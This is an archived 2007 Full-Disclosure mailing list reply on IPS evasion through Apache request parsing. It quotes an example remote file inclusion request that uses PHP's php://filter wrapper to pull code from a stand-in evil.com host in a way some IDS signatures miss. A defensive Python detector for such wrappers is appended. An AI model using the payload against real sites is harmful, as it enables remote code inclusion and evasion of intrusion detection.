Re: IPS Evasion with the Apache HTTP Server
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Wed, 20 Jun 2007 17:50:55 +0400
Dear Jamie Riden,
--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to 3APA3A () security nnov ru:
JR> (This is what I gathered from the original posting, but I might be wrong.)
JR> I think the issue is not that the apache server behaviour is wrong as
The original BreakingPoint article the author refers to says "The intent is
to describe the strange behaviors of network applications". It mentions
no IPS products at all, only IIS and Apache. And at least one case of
Apache behavior is partially expected (because of the RFC) and already
described (by Michal Majchrowicz).
JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:
IPS may detect known attacks. Just like antivirus, you may use IPS to
protect against known viruses/exploits. The ability to bypass IPS with a
new one is not a bug. I do collect different content filtering bypassing
You simply MUST accept the risk that there is always a way to bypass
content filtering. Likewise, IPS doesn't protect your network by itself. IPS
is nothing but a tool.
JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request", when it should actually be alerting that an
JR> RFI attempt was made.
In this situation IDS/IPS should alert that an unsupported request attempt was
made, and block this attempt in the case of IPS.
JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that an RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )
I can write a buggy application, and an attempt to exploit it will never be
detected by existing signatures.
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
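As an added defender-side illustration of the php://filter point raised in the quoted paragraph (example code written for this archive page, not code from the thread, from PHP or from any IDS product): a small request-line checker that, instead of matching only "=http://" as a naive signature would, repeatedly URL-decodes each query parameter and flags any stream-wrapper scheme, including the php://filter/resource= form wrapping a remote target. The request lines, parameter names and the list of wrapper prefixes are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed list: scheme/wrapper prefixes that mean the "file" handed to a
# PHP include is not a plain local path. Extend to taste; it is an assumption.
WRAPPER_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "php://",
                    "data:", "expect://", "phar://", "zip://", "glob://")


def normalize(value):
    """Repeat URL-decoding until the value stops changing (defeats %25xx
    double encoding that a single-decode signature would miss), then lowercase."""
    prev = None
    while value != prev:
        prev, value = value, unquote(value)
    return value.lower()


def find_remote_includes(request_line):
    """Inspect a request line such as 'GET /rfi.php?x=... HTTP/1.1' and return
    (parameter, reason) pairs for every query value that starts with a wrapper
    scheme. For php://filter, the nested resource= target is reported as well,
    which is exactly the shape a '=http://'-only signature does not see."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw)
        if not value.startswith(WRAPPER_PREFIXES):
            continue
        reason = "wrapper scheme in include parameter"
        nested = re.search(r"resource=([a-z][a-z0-9+.-]*:)", value)
        if value.startswith("php://filter") and nested:
            reason = "php://filter wrapping remote resource " + nested.group(1)
        findings.append((name, reason))
    return findings


if __name__ == "__main__":
    # Constructed sample request lines, including the one quoted in the thread.
    for line in (
        "GET /rfi.php?includedir=php://filter/resource=http://www.evil.com HTTP/1.1",
        "GET /rfi.php?includedir=http://www.evil.com/x.txt HTTP/1.1",
        "GET /rfi.php?includedir=pages/home.php HTTP/1.1",
    ):
        print(line, "->", find_remote_includes(line))
```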